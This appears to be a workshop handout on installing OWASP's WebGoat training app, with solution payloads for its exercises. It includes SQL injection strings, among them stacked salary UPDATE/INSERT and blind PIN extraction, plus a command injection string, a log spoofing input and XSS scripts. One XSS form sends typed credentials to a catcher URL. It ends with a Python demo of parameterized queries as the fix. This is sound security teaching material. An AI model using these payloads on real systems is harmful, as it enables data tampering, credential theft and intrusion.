# 2020.12.18 Hands-on Introduction

## What is WebGoat

### Official site

Link: https://owasp.org/www-project-webgoat/

## Environment setup

### 1. Install the Java runtime environment

https://java.com/zh_TW/download/manual.jsp

### 2. Set the environment variable

```
C:\Program Files\Java\jre1.8.0_xxx\bin
```

Confirm the version:

```
java -version
```

### 3. Download WebGoat

https://github.com/WebGoat/WebGoat/releases?after=v8.0.0.M4

### 4. Start the WebGoat background process

Put the file under C:/webgoat, then run:

```
java -jar C:/webgoat/webgoat-container-7.1-exec.jar
```

### 5. Start the WebGoat web service

Type this URL into the browser on your own machine:

http://localhost:8080/WebGoat/

#### Credentials

guest/guest

## Exercises

### Exercise 1

#### Injection Flaws > Numeric SQL Injection

```
&station = 102 or 1=1
```

However, the request cannot be modified directly in this exercise --> use a tool to intercept the request, modify it, and then send it.

Tool: install Burp Suite Community https://portswigger.net/

### Exercise 2

#### Injection Flaws > String SQL Injection

```
Smith' or '1'='1
```

[Update]

```
Smith' ; Update salaries set salary = 1000000 where userid = 'jsmith';SELECT * from salaries where '1' = '1
```

[Insert]

```
Smith' ; Insert Into salaries (userid,salary) values ('hello', 200);SELECT * from salaries where '1' = '1
```

### Exercise 3

#### Injection Flaws > Blind Numeric SQL Injection

```
101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 300 );
```

### Exercise 4

#### Injection Flaws > Blind String SQL Injection

```
101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );
```

### Exercise 5

#### Injection Flaws > Command Injection

```
& netstat -an & ipconfig
```

Burp Suite Community must be installed.

### Exercise 6

#### Injection Flaws > Log Spoofing

```
test%0aLogin succeeded for username:admin
```

### Exercise 7

#### Cross-Site Scripting (XSS) -> Reflected XSS Attacks

```
<script>alert('Activate XSS')</script>
```

### Exercise 8

#### Cross-Site Scripting (XSS) -> Stored XSS Attacks

```
<script>alert('User Information has been stolen')</script>
```

### Exercise 9

#### Cross-Site Scripting (XSS) -> Stage1: Stored XSS Attacks

Edit your own profile:

```
<script>alert('Link to malicious site')</script>
```

### Exercise 10

#### Cross-Site Scripting (XSS) -> Phishing with XSS

```
function hack(){
  alert("Login="+document.forms[0].user.value + "Password="+document.forms[0].pass.value);
  XSSImage=new Image;
  XSSImage.src="http://localhost:8080/webgoat/catcher"
    +"?PROPERTY=yes"
    +"&user="+document.forms[0].user.value
    +"&password="+document.forms[0].pass.value;
}
<form>
<br><br><HR>
<H3>This feature requires account login:</H3>
<br><br>
Enter Username:<br><input type="text" id="user" name="user"><br>
Enter Password:<br><input type="password" name="pass"><br>
<input type="submit" name="login" value="login" onclick="hack()">
</form>
<br><br><HR>
```

### Exercise 11

#### Injection Flaws > LAB: SQL Injection

```
' or '1'='1
```

### Exercise 12

#### Injection Flaws > LAB: SQL Injection

```
101 or 1=1 order by employee_id desc
```
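Why the payloads in Exercises 1 and 2 work, and what closes the hole: an added example (not part of these notes or of WebGoat) that runs the page's `102 or 1=1` and `Smith' or '1'='1` inputs against a string-concatenated query and against a parameterized one. The in-memory SQLite table, its name and its rows are constructed for the demo and are not WebGoat's real schema.

```python
import sqlite3

# Constructed sample table loosely modelled on WebGoat's SQL injection lessons;
# the table name, columns and rows are assumptions, not WebGoat's real schema.
SAMPLE_ROWS = [(101, "John", "Smith"), (102, "Jane", "Doe"), (103, "Joe", "Snow")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user_data (userid INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO user_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def by_name_unsafe(conn, last_name):
    # The lesson's bug: input is pasted into the SQL text, so a quote in the
    # input ends the literal and everything after it is parsed as SQL.
    sql = "SELECT * FROM user_data WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def by_name_safe(conn, last_name):
    # Hardened form: the value is bound as a parameter and never parsed as SQL.
    return conn.execute("SELECT * FROM user_data WHERE last_name = ?", (last_name,)).fetchall()


def by_id_unsafe(conn, userid):
    # Numeric variant (Exercise 1): no quotes around the value, so no quote
    # is needed to break out; "102 or 1=1" becomes a tautology as written.
    sql = "SELECT * FROM user_data WHERE userid = " + str(userid)
    return conn.execute(sql).fetchall()


def by_id_safe(conn, userid):
    # Bound parameter: the whole string is compared to the integer column
    # as one value and matches nothing.
    return conn.execute("SELECT * FROM user_data WHERE userid = ?", (userid,)).fetchall()


def compare(name_input, id_input):
    # Row counts returned by each variant for the same two inputs.
    conn = make_db()
    return {
        "name_unsafe": len(by_name_unsafe(conn, name_input)),
        "name_safe": len(by_name_safe(conn, name_input)),
        "id_unsafe": len(by_id_unsafe(conn, id_input)),
        "id_safe": len(by_id_safe(conn, id_input)),
    }


if __name__ == "__main__":
    print(compare("Smith' or '1'='1", "102 or 1=1"))  # unsafe: 3 rows each; safe: 0 rows each
```

With honest inputs (`"Smith"`, `102`) all four variants return exactly one row, so the parameterized versions lose no functionality.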